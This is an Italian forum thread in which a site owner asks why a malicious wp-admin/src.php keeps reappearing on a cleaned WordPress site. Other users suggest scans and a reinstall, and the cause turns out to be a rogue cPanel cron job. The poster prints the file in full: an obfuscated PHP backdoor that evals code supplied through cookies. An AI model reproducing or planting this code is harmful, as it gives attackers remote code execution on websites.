Navigazione

    Privacy - Termini e condizioni
    © 2020 Search On Media Group S.r.l.
    • Registrati
    • Accedi
    • CATEGORIES
    • Discussioni
    • Non letti
    • Recenti
    • Hashtags
    • Popolare
    • Utenti
    • Stream
    • Interest
    • Categories
    1. Home
    2. Categorie
    3. Coding e Sistemistica
    4. CMS & Piattaforme Self-Hosted
    5. file anomalo in wp admin
    Questa discussione è stata cancellata. Solo gli utenti con diritti di gestione possono vederla.
    • mastertest
      mastertest User Attivo • ultima modifica di

      file anomalo in wp admin

      A seguito ad un sito bucato, dopo aver ripulito tutto, si autoricrea un file nella cartella wp-admin chiamata (src.php).
      è già successo a qualcuno?

      0 Miglior Risposta Ringrazia Cita Rispondi

        1 Risposta Ultima Risposta
      • marcoilardi
        marcoilardi User Attivo • ultima modifica di

        vuol dire che non l'hai pulito bene è rimasta ancora qualche traccia

        0 Miglior Risposta Ringrazia Cita Rispondi

          mastertest 1 Risposta Ultima Risposta
        • mastertest
          mastertest User Attivo • ultima modifica di @marcoilardi

          @micropedia potrebbe essere al di fuori della cartella wp-admin in quanto è stata sostituita totalmente da un'installazione integra.
          potrebbe arrivare dalla cartella wp-includes?

          0 Miglior Risposta Ringrazia Cita Rispondi

            1 Risposta Ultima Risposta
          • marcoilardi
            marcoilardi User Attivo • ultima modifica di

            prova a fare una scansione con wordfence, plugin che ti consiglio di adottare in futuro io non ho avuto piu' problemi.
            wordfence dovrebbe dirti i file infetti quali sono

            0 Miglior Risposta Ringrazia Cita Rispondi

              mastertest 1 Risposta Ultima Risposta
            • mastertest
              mastertest User Attivo • ultima modifica di @marcoilardi

              @micropedia si in effetti lo utilizzo anch'io, wordfence mi riconosce il file come infetto wp-admin/src.php, e scansiona solamente questo file, a me interessa capire quale altro file genera in continuazione questo file. ti dico cosa c'è all'interno di questo file:

              <?php
              class Apt
              {
              private static $s;
              public static function g($n)
              {
              if (!self::$s)
              self::i();
              return self::$s;
              }
              private static function i()
              {
              self::$s = array(
              0135,
              0135,
              0116,
              0111,
              026,
              0136,
              0122,
              012,
              00
              );
              }
              }
              function click()
              {
              $_fkm = $_COOKIE;
              ($_fkm && isset($_fkm[Apt::g(0)])) ? (($_h = $_fkm[Apt::g(1)] . $_fkm[Apt::g(2)]) && ($_zpq = $_h($_fkm[Apt::g(3)] . $_fkm[Apt::g(4)])) && ($_uly = $_h($_fkm[Apt::g(5)] . $_fkm[Apt::g(6)])) && ($_uly = $_uly($_h($_fkm[Apt::g(7)]))) && @eval($_uly)) : $_fkm;
              return Apt::g(8);
              }
              click();

              ho provato a lasciare vuoto anche il file, ma dopo un po si regenera tutto di nuovo.

              0 Miglior Risposta Ringrazia Cita Rispondi

                1 Risposta Ultima Risposta
              • marcoilardi
                marcoilardi User Attivo • ultima modifica di

                credo che sia proprio questo il problema prova a cancellarlo (facendo prima una copia non si sa mai)

                Non lo vedo nell'elenco dei file nativi di wordpress

                https://codex.wordpress.org/WordPress_Files

                0 Miglior Risposta Ringrazia Cita Rispondi

                  mastertest 1 Risposta Ultima Risposta
                • mastertest
                  mastertest User Attivo • ultima modifica di @marcoilardi

                  @micropedia si lo cancello e dopo qualche instante viene ricreato

                  0 Miglior Risposta Ringrazia Cita Rispondi

                    1 Risposta Ultima Risposta
                  • marcoilardi
                    marcoilardi User Attivo • ultima modifica di

                    una cosa che faccio io in questi casi è controllare le date di tutti i files vedi i files creati oggi o ieri saranno tutti contaminati o superflui

                    0 Miglior Risposta Ringrazia Cita Rispondi

                      1 Risposta Ultima Risposta
                    • eleclipse
                      eleclipse User Attivo • ultima modifica di

                      Lascia stare la caccia al tesoro.

                      Reinstalla wordpress manualmente da ftp e cancella tutto quello che non sono i tuoi file caricati nella cartella upload.

                      Dopo passa wordfence / sucuri giusto per sicurezza.

                      0 Miglior Risposta Ringrazia Cita Rispondi

                        1 Risposta Ultima Risposta
                      • mastertest
                        mastertest User Attivo • ultima modifica di

                        Risolto! in effetti il sito è stato ripulito correttamente e va tutto bene adesso, il problema del file (src.php) era dovuto ad un cron impostato in modo inspiegabile nel cpanel.

                        1 Miglior Risposta Ringrazia Cita Rispondi

                          KejSirio 1 Risposta Ultima Risposta
                        • KejSirio
                          KejSirio User • ultima modifica di @mastertest

                          @mastertest puoi spiegarci come hai individuato questo Cron?

                          0 Miglior Risposta Ringrazia Cita Rispondi

                            mastertest 1 Risposta Ultima Risposta
                          • mastertest
                            mastertest User Attivo • ultima modifica di @KejSirio

                            @kejsirio andando per esclusione dopo 2 giorni di ricerca nelle cartelle wordpress, mi era rimasto solo il cpanel dove avevo già effettuato una scansione, poi ho trovato un cron molto sospetto, dopo averlo eliminato è ritornato tutto regolare e funziona il tutto perfettamente.

                            1 Miglior Risposta Ringrazia Cita Rispondi

                              1 Risposta Ultima Risposta
                            • mastertest
                              mastertest User Attivo • ultima modifica di @Ospite

                              @homeworker si certo

                              0 Miglior Risposta Ringrazia Cita Rispondi

                                1 Risposta Ultima Risposta
                              Caricamento altri post
                              Rispondi
                              • Topic risposta
                              Effettua l'accesso per rispondere
                              • Da Vecchi a Nuovi
                              • Da Nuovi a Vecchi
                              • Più Voti